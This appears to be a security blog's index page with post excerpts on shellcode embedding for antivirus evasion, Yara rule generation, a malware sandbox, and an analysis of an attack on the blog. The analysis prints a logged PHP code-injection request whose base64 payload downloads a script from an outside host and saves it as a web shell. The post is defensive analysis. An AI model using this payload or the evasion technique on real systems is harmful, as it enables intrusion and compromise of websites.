Embedding a shellcode in a PE file
Some time ago a friend asked in a private mailing list about possible ways to embed a shellcode in one executable file (PE) and ways to bypass AV detection. I recommended him to use any Windows supplied PE file (or any other 'goodware' PE file) and patching some "always called function" with the shellcode. It turned out to be one of the many possible AV evasion techniques that seems to work in many cases. The unique problem was that there is no tool to do this, so I decided to write one tool (based on Pyew) for doing this task.
Extracting binary patterns in malware sets and generating Yara rules
Some time ago a friend and I were talking about how to create a tool to compare a set of malware samples and extract the binary patterns matched in all or most of the samples. Searching for diffing algorithms I found out some very interesting books on the matter like "O(ND) Difference Algorithm and its Variations" and many utility libraries for diffing like Google Diff Match Patch. Finally, I decided to write a test tool using this library and ended up with an automatic Yara signatures generator.
Automated or manual attack?
Today I received a notification about an automated attack against this blog. Nothing new, however, I was curious about how it exactly works and decided to take a brief look to the attack to answer various questions:
- What vulnerability is this exploiting? Am I vulnerable?
- What does the payload?
- Is this an automated attack or a manually launched one?
The attack in the logs
Since I installed mute screamer plugin for WordPress I receive regularly attack alerts (mainly about spamming). The one I received today was a bit different. In the generated log file the following line appears:
/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));
So, this is an exploit for a PHP code injection vulnerability in "engine.php". A quick search of the vulnerability revealed this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don't have this plugin installed so I already answered the first 2 questions. Time to answer the next one: what the payload does?
Zerowine 2.0 preview
Hi!
I plan to release in a month or so the newest version of ZeroWine focused on automation. This new version consists in the following components:
- A modified version of Wine 1.10.
- One XMLRPC Server.
- One XMLRPC client tool.
Dangers of Oracle Virtual Columns
Virtual Columns is a new feature of Oracle 11g. This feature allows to create table columns based on PL/SQL functions. While it's useful it can be dangerous too.